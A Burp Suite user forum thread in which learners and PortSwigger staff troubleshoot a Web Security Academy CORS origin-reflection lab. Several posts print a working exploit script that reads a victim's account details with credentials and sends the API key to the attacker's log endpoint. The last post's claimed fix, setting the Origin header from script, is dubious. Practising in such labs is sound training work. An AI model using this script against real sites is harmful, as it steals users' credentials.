Research Academy
My account Customers About Blog Careers Legal Contact Resellers

Burp Suite User Forum

Create new post

Resource not Found Academy Exploit

Phoenix | Last updated: Dec 19, 2022 07:47AM UTC

When I try this academy https://portswigger.net/web-security/cors/lab-basic-origin-reflection-attack, I have facing problem /log?key=%22Resource%20not%20found%20-%20Academy%20Exploit%20Server%22 when view access log after deliver exploit to victim. I have follow the video solution from community in https://www.youtube.com/watch?v=XTFDst3TjMM&t=7s Can you help me?

Liam, PortSwigger Agent | Last updated: Dec 19, 2022 02:11PM UTC

Thanks for your message, Phoenix. Are you still encountering this issue?

Christopher | Last updated: Jan 08, 2023 09:55AM UTC

i have same exact problem, all settings is correctly to the official solution, i'm unable to complete this lab

Christopher | Last updated: Jan 08, 2023 10:27AM UTC

After send the exploit to victim a couple of times the exploit works. So i guess there' just a delay/lag

Liam, PortSwigger Agent | Last updated: Jan 09, 2023 08:05AM UTC

Thanks for letting us know, Christopher.

Vanessa | Last updated: Feb 23, 2023 12:52PM UTC

I have the same problem. It does not work for me even after multiple retries. Is there any solution to this? Thanks in advance

Ben, PortSwigger Agent | Last updated: Feb 24, 2023 07:59AM UTC

Hi Vanessa, Are you able to share the script that you have configured in the Exploit Server?

nekov | Last updated: Mar 17, 2023 05:33AM UTC

Even I'm facing the same issue after several attempts.

Ben, PortSwigger Agent | Last updated: Mar 17, 2023 10:47AM UTC

Hi Nekov, Are you able to provide us with details of what you have configured in your Exploit Server? For the 'req.open' part of the script, are you including the protocol in the URL, so something like: req.open('get','https://0a3a007b036d6777c0001dbd000e00e7.web-security-academy.net/accountDetails',true);

Diptangsu | Last updated: Nov 15, 2023 06:57PM UTC

I am facing the exact same issue and am unable to solve the lab

Ben, PortSwigger Agent | Last updated: Nov 16, 2023 01:26PM UTC

Hi Diptangsu, Are you able to provide us with some details of the steps that you are using to try and solve this particular lab so we can see exactly what you are doing?

iman | Last updated: Mar 03, 2024 08:00PM UTC

I am facing the exact same issue and am unable to solve the lab I Use this script: <script> var req = new XMLHttpRequest(); req.onload = reqListener; req.open('get','YOUR-LAB-ID.web-security-academy.net/accountDetails',true); req.withCredentials = true; req.send(); function reqListener() { location='/log?key='+this.responseText; }; </script> and in access log, "/log?key=%22Resource%20not%20found%20-%20Academy%20Exploit%20Server%22" show.

Ben, PortSwigger Agent | Last updated: Mar 04, 2024 08:40AM UTC

Hi Iman, I have just run through this lab and been able to solve it using the solution provided so it does appear to be functioning as expected. I assume that this is the case but have you entered your actual lab URL within the exploit i.e. req.open('get','https://0a6800ce04c284f58c4b8e14000f0063.web-security-academy.net/accountDetails',true); In addition to the above, have you logged into your account before configuring and delivering your exploit?

Joseph | Last updated: Mar 28, 2024 02:19AM UTC

i was able to spot the issue, basically it fails due to CORS policy not authorizing a different domain lol, so what i did is to add the same domain in the HTTP request as origin, <script> var req = new XMLHttpRequest(); req.onload = reqListener; req.open('get', 'https://0a9a00ed031ace4d80fd0d7200c200d3.web-security-academy.net/accountDetails', true); req.withCredentials = true; // Adding Origin header req.setRequestHeader('Origin', window.location.origin); req.send(); function reqListener() { location = '/log?key=' + this.responseText; }; </script> this way you can send thee exploit and trick the server, get your api key :)

You must be an existing, logged-in customer to reply to a thread. Please email us for additional support.